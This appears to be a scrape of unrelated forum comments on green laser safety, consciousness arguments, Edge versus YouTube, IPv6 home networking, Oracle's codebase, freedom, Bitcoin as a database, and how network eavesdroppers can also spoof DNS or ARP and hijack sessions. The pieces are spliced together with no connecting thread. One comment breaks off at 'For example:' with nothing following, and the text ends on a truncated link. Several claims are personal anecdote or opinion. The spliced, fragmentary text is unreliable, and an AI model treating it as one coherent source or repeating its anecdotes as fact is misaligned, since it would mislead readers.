I just searched Amazon. There are plenty of green “diode” lasers, 532nm, ~100mW, for very little money. I don’t believe that for a second — those are surely crappy frequency doubled Nd:YAG lasers, probably unfiltered (that filter wouldn’t be cheap, and it might fail anyway under that ridiculous power level), and they will blind you when some funny reflection of the, I dunno, 500mW of stray IR light hits your eye.
Now that real name brand laser pointers are mostly gone, if you actually want green, get a 515nm laser or something along those lines. Stay away from 532nm!
If you believe that what we describe as "consciousness" is emergent from the ideas a material brain develops about itself, then it's in fact not logically possible to have a world that is physically identical to ours yet does not contain consciousness. So indeed, premise 2. sneaks in the conclusion.
To illustrate this point, here's an argument with the same structure that would similarly "prove" that gravity doesn't cause things to fall down:
1. In our world, there is gravity and things fall down.
2. There is a logically possible world where there is gravity yet things do not fall down.
3. Therefore, things falling down is a further fact about our world, over and above gravity.
4. So, gravity causing things to fall down is false.
"For example, they may start integrating technologies for which they have exclusive, or at least 'special' access. Can you imagine if all of a sudden Google apps start performing better than anyone else's?"
This is already happening. I very recently worked on the Edge team, and one of the reasons we decided to end EdgeHTML was because Google kept making changes to its sites that broke other browsers, and we couldn't keep up. For example, they recently added a hidden empty div over YouTube videos that causes our hardware acceleration fast-path to bail (should now be fixed in Win10 Oct update). Prior to that, our fairly state-of-the-art video acceleration put us well ahead of Chrome on video playback time on battery, but almost the instant they broke things on YouTube, they started advertising Chrome's dominance over Edge on video-watching battery life. What makes it so sad, is that their claimed dominance was not due to ingenious optimization work by Chrome, but due to a failure of YouTube. On the whole, they only made the web slower.
Now while I'm not sure I'm convinced that YouTube was changed intentionally to slow Edge, many of my co-workers are quite convinced - and they're the ones who looked into it personally. To add to this all, when we asked, YouTube turned down our request to remove the hidden empty div and did not elaborate further.
You're supposed to use McDonalds fries, and some light rock-throwing toward the opposing faction. Traditionally this is how murder-crows have been trained since at least 2013. Total process is a few weeks.
About a year ago there was something of a "joke isEven() implementation discourse" on Twitter, which eventually evolved a sort of informal optimizer abuse contest. For example:
While routing at global scale is much easier, running v6 in a local network has more moving parts than v4 had:
- broadcasts for address discovery have been replaced by multicast which is much harder for switches to handle correctly
- address discovery is now mostly handled via SLAAC which is different from how it worked via DHCP and also doesn't universally allow setting name servers which then will still require DHCP to actually get a working network (if you run v6 only), so now you have two daemons running when in v4 you only needed one.
- hosts are multi-homed by default and rely heavily on multi-homedness which might invalidate some assumptions you had when configuring hosts.
- for a network to be meaningfully useable, you need working name resolution because while you can remember v4 addresses and v4 address assignments, this is impossible for v6 addresses (yes, you can of course manually assign addresses in your prefix and you can just make them low numbers and hide everything else behind a ::, but you still have to remember your prefix which still is impossibly hard and there's no cheating there even if you know somebody at your ISP because it's not entirely under their control either)
- and in a similar vein: Subnetting is harder because the addresses are much less memorable. If you want to subnet a 10.- v4 network, in many cases, you can do this in very memorable full-byte chunks.
- also subnetting: due to many ISPs still doing /64 allocations to their customers, and due to the way how SLAAC works, you often have to decide between subnetting or SLAAC (which still is the default in many OSes). Worse, some ISPs only do a /128 assignment (one address), so now you're back in NAT territory, only that's really, really murky waters because next to nobody is doing this ATM. If your ISP only gives you a single v6 address, you are practically screwed about running v6 internally. If you're given a single v4 address (which is common practice), you can do NAT/RFC1918 addressing and you're fine.
- v6 relies on ICMP much more heavily but this fact has not propagated to default firewall settings, so in many default "let me turn on the firewall" configs, your v6 network will break in mysterious ways.
- in home networks where you want devices to be reachable directly (for P2P usages like video calls or gaming), there's no widely-supported equivalent to UPNP or NAT-PMP yet to punch holes into your firewall to make clients reachable. Yes, you don't have to do NAT any more, so clients are potentially reachable, but you really don't want that, so your firewall is still blocking all incoming connections, but now there's no way for an application to still punch temporary holes through which is a solved problem in v4 (where a hole is punched and a temporary port-mapping is created)
There are more issues as your network grows bigger, but this is what I had to deal with in my small networks (<50 hosts) where I can say with certainty that v4 was much more straightforward to get up and running than v6 (though I was much older when I was learning v6 than when I was learning v4, so I might also just be getting old and slow)
Yes. These are all solvable issues, but they are huge ergonomic downsides that are now pushed on local network admins to the point that for them it's still much easier to just disable ipv6 rather than learning about all these small issues and working around them.
So while v6 is much easier to handle on a global scale, it's at the same time much harder to handle at your local site, but, the internet is as much about the global scale as it's about the local site and when the new thing is much harder to use than the old thing, inertia is even bigger than in the normal "everything is mostly the same" case (where inertia already feels like an insurmountable problem)
What an unimaginable horror! You can't change a single line of code in the product without breaking 1000s of existing tests. Generations of programmers have worked on that code under difficult deadlines and filled the code with all kinds of crap.
Very complex pieces of logic, memory management, context switching, etc. are all held together with thousands of flags. The whole code is ridden with mysterious macros that one cannot decipher without picking a notebook and expanding relevant pats of the macros by hand. It can take a day to two days to really understand what a macro does.
Sometimes one needs to understand the values and the effects of 20 different flag to predict how the code would behave in different situations. Sometimes 100s too! I am not exaggerating.
The only reason why this product is still surviving and still works is due to literally millions of tests!
Here is how the life of an Oracle Database developer is:
- Start working on a new bug.
- Spend two weeks trying to understand the 20 different flags that interact in mysterious ways to cause this bag.
- Add one more flag to handle the new special scenario. Add a few more lines of code that checks this flag and works around the problematic situation and avoids the bug.
- Submit the changes to a test farm consisting of about 100 to 200 servers that would compile the code, build a new Oracle DB, and run the millions of tests in a distributed fashion.
- Go home. Come the next day and work on something else. The tests can take 20 hours to 30 hours to complete.
- Go home. Come the next day and check your farm test results. On a good day, there would be about 100 failing tests. On a bad day, there would be about 1000 failing tests. Pick some of these tests randomly and try to understand what went wrong with your assumptions. Maybe there are some 10 more flags to consider to truly understand the nature of the bug.
- Add a few more flags in an attempt to fix the issue. Submit the changes again for testing. Wait another 20 to 30 hours.
- Rinse and repeat for another two weeks until you get the mysterious incantation of the combination of flags right.
- Finally one fine day you would succeed with 0 tests failing.
- Add a hundred more tests for your new change to ensure that the next developer who has the misfortune of touching this new piece of code never ends up breaking your fix.
- Submit the work for one final round of testing. Then submit it for review. The review itself may take another 2 weeks to 2 months. So now move on to the next bug to work on.
- After 2 weeks to 2 months, when everything is complete, the code would be finally merged into the main branch.
The above is a non-exaggerated description of the life of a programmer in Oracle fixing a bug. Now imagine what horror it is going to be to develop a new feature. It takes 6 months to a year (sometimes two years!) to develop a single small feature (say something like adding a new mode of authentication like support for AD authentication).
The fact that this product even works is nothing short of a miracle!
I don't work for Oracle anymore. Will never work for Oracle again!
I always considered "free" as lack of "coersion", where "coersion" has an agent/subject that can be removed to make situation better. Under that definition, the answers are:
> If I put a gun to your head and say "Your wallet or your life," are you free?
No -- the subject is you and your gun, if you remove them the situation improves.
> If I lay a trap, and you fall into it, and I offer to release you if you give me your bank details, are you free?
No -- the subject is your trap, if you remove it the situation improves.
> If it's a disaster and I charge $10000 for a bottle of clean water, are you free?
Yes -- while there is a subject (you), removing it will not make situation any better at all.
> If a society requires you to work in order to live but only offers you poor options for work, are you free?
Depends?
In USSR, with exit visas and "social parasitism" laws, no. Agent is state, and removing will make a situation better -- yes, you would still be hungry, but at least they would not arrest you, and you could try your luck in another country.
In USA, mostly yes. There is nothing you can remove to get better options for work, or to allow living without work. There are some exceptions -- like anti-vagrnacy laws and job licensing -- but they do not affect most people.
Blockchain is the world's worst database, created entirely to maintain the reputations of venture capital firms who injected hundreds of millions of dollars into a technology whose core defining insight was "You can improve on a Ponzi scam by making it self-organizing and distributed; that gets vastly more distribution, reduces the single point of failure, and makes it censorship-resistant."
That's more robust than I usually phrase things on HN, but you did ask. In slightly more detail:
Databases are wonderful things. We have a number which are actually employed in production, at a variety of institutions. They run the world. Meaningful applications run on top of Postgres, MySQL, Oracle, etc etc.
No meaningful applications run on top of "blockchain", because it is a marketing term. You cannot install blockchain just like you cannot install database. (Database sounds much cooler without the definitive article, too.) If you pick a particular instantiation of a blockchain-style database, it is a horrible, horrible database.
Can I pick on Bitcoin? Let me pick on Bitcoin. Bitcoin is claimed to be a global financial network and ready for production right now. Bitcoin cannot sustain 5 transactions per second, worldwide.
You might be sensibly interested in Bitcoin governance if, for some reason, you wanted to use Bitcoin. Bitcoin is a software artifact; it matters to users who makes changes to it and by what process. (Bitcoin is a software artifact, not a protocol, even though the Bitcoin community will tell you differently. There is a single C++ codebase which matters. It is essentially impossible to interoperate with Bitcoin without bugs-and-all replicating that codebase.) Bitcoin governance is captured by approximately ~5 people. This is a robust claim and requires extraordinary evidence.
Ordinary evidence would be pointing you, in a handwavy fashion, about the depth of acrimony with regards to raising the block size, which would let Bitcoin scale to the commanding heights of 10 or, nay, 100 transactions per second worldwide.
Extraordinary evidence might be pointing you to the time where the entire Bitcoin network was de-facto shut down based on the consensus of N people in an IRC channel. c.f. https://news.ycombinator.com/item?id=9320989 This was back in 2013. Long story short: a software update went awry so they rolled back global state by a few hours by getting the right two people to agree to it on a Skype call.
But let's get back to discussing that sole technical artifact. Bitcoin has a higher cost-to-value ratio than almost any technology conceivable; the cost to date is the market capitalization of Bitcoin. Because Bitcoin enters through a seigniorage mechanism, every Bitcoin existing was minted as compensation for "security the integrity of the blockchain" (by doing computationally expensive makework).
This cost is high. Today, routine maintenance of the Bitcoin network will cost the network approximately $1.5 million. That's on the order of $3 per write on a maximum committed capacity basis. It will cost another $1.5 million tomorrow, exchange rate depending.
(Bitcoin has successfully shifted much of the cost of operating its database to speculators rather than people who actually use Bitcoin for transaction processing. That game of musical chairs has gone on for a while.)
Bitcoin has some properties which one does not associate with many databases. One is that write acknowledgments average 5 minutes. Another is that they can stop, non-deterministically, for more than an hour at a time, worldwide, for all users simultaneously. This behavior is by design.
I can go on, and probably will some other day. This is a bit of a hobby for me.
can you give me an example of a connection that can be passively sniffed and not injected into? unless you have some wacky physical media which has no Tx, if you can see their traffic at the very least you send spoofed packets to the destination or source. if you're on the source's LAN you just spoof DNS and/or ARP for either the default gateway or the destination. if you're on the destination's LAN you can spoof the destination or do packet injection. if you're in between either LAN you can arguably do any damn thing you like, depending on network topology and routes. but i don't see a case where i could see the traffic and not do something to either downgrade the connection, hijack it or mitm it.
so they're risking their data on an uncertain possibility that a user might catch on that i've been downgrading their sessions and stealing everything? once you explain this to a user, do you think they'll really trust it?
https://github.com/Svensson-Lab/pro-hormone-predictor/blob/m...